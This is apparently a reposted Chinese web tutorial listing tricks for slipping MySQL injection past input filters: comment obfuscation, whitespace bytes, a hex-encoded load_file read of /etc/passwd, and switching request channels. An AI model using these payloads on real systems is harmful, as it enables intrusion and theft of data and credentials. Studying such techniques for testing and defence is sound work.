首頁 > 開發者 > MySQL

mysql注入繞過的一些技巧

來源:互聯網
上載者:User
創建阿里雲帳戶,並獲得超過 40 款產品的免費試用版;而企業帳戶則可以享有總值 $1200 的免費試用版。立即註冊!

標籤:

雖然mysql + php的開發中可以使用pdo中,但是有些老久的程式沒有使用,或其他原因

 

1.注釋繞過

select/*comment*/user/*zzsdsdsf*/from mysql.user;

 

2.內聯注釋繞過

/*!12345select*//*!12345user*/ from mysql.user;

 

3.特殊空白字元繞過

在php中\s會匹配0x09,0x0a,0x0b,0x0c,0x0d,0x20

但是在mysql中空白字元為  0x09,0x0a,0x0b,0x0c,0x0d,0x20,0xa0 

0xa0有時候有奇效

0x0a和0x0d會影響"."的匹配,有時候也是可以利用的

 

4.十六進位繞過

select load_file(‘0x2f6574632f706173737764‘);

python

>>> ‘/etc/passwd‘.encode(‘hex‘)
‘2f6574632f706173737764‘

 

5.換一種提交姿勢繞過

有時候程式員只過濾了GET中的危險字元,可以試試POST,COOKIES甚至是FILES

 

6.mysql黑魔法繞過

select{x user}from {x mysql.user};

mysql注入繞過的一些技巧

本文章原先以中文撰寫並發佈於 aliyun.com,亦設英文版本,僅作資訊用途。本網站不對文章的準確性,完整性或可靠性或其任何翻譯作出任何明示或暗示的陳述或保證。如對該文章有任何疑慮或投訴,請傳送電郵至 info-contact@alibabacloud.com 並提供相關疑慮或投訴的詳細說明。職員會於 5 個工作天內與您聯絡,一經驗證之後,即會刪除該侵權內容。

聯繫我們

該頁面正文內容均來源於網絡整理,並不代表阿里雲官方的觀點,該頁面所提到的產品和服務也與阿里云無關,如果該頁面內容對您造成了困擾,歡迎寫郵件給我們,收到郵件我們將在5個工作日內處理。

如果您發現本社區中有涉嫌抄襲的內容,歡迎發送郵件至: info-contact@alibabacloud.com 進行舉報並提供相關證據,工作人員會在 5 個工作天內聯絡您,一經查實,本站將立刻刪除涉嫌侵權內容。

A Free Trial That Lets You Build Big!

Start building with 50+ products and up to 12 months usage for Elastic Compute Service

Get Started for Free

  • Sales Support

    1 on 1 presale consultation

    Chat Contact Sales

  • After-Sales Support

    24/7 Technical Support 6 Free Tickets per Quarter Faster Response

    Open a Ticket

  • Alibaba Cloud offers highly flexible support services tailored to meet your exact needs.

    Learn More